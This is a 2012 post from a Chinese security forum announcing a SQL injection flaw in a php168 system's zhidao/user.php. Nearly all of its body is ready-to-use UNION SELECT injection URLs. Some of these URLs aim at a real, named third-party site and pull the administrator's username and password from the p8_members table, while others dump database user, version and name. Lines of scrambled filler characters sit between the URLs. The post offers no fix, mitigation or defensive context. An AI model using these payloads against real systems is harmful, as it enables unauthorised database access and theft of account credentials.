找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2981|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
7 o! \' B* L! F- w* {3 t) p9 a+ `                                                         
" ~' K4 ^+ Q" N1 C                                       & O# K+ Z. P! X  R

6 |, c2 I9 x+ h) z. L" q! q
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
& t1 `' q  i3 k, j: i% A                                                     6 B  Y, Z# j& W) o/ c2 w6 D
                                                                  
1 U( t" o! {- @4 F1 o! l/ ]4 h- R                                                        9 {+ M6 h8 i. j' l& k# Z
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
% l3 Z  o; R0 L* L9 l/ ?/ O+ A% s2 H- t# r- e+ W- E- Q2 c
( K  f5 `; E  y: m1 t) {; A

+ k3 C) X- p5 |0 _1 Z$ e                                                            
( f* i& m1 q3 d4 V
/ A1 ^- I: @& K. B2 _http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
- F/ Y/ L" u2 j+ f: s9 f- k) H& n8 j) A

! @. m# L! V' [6 e
2 T0 _. ~5 M# t, v) _( X2 f9 k                                                                    1 B, r. p& X6 G1 _

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表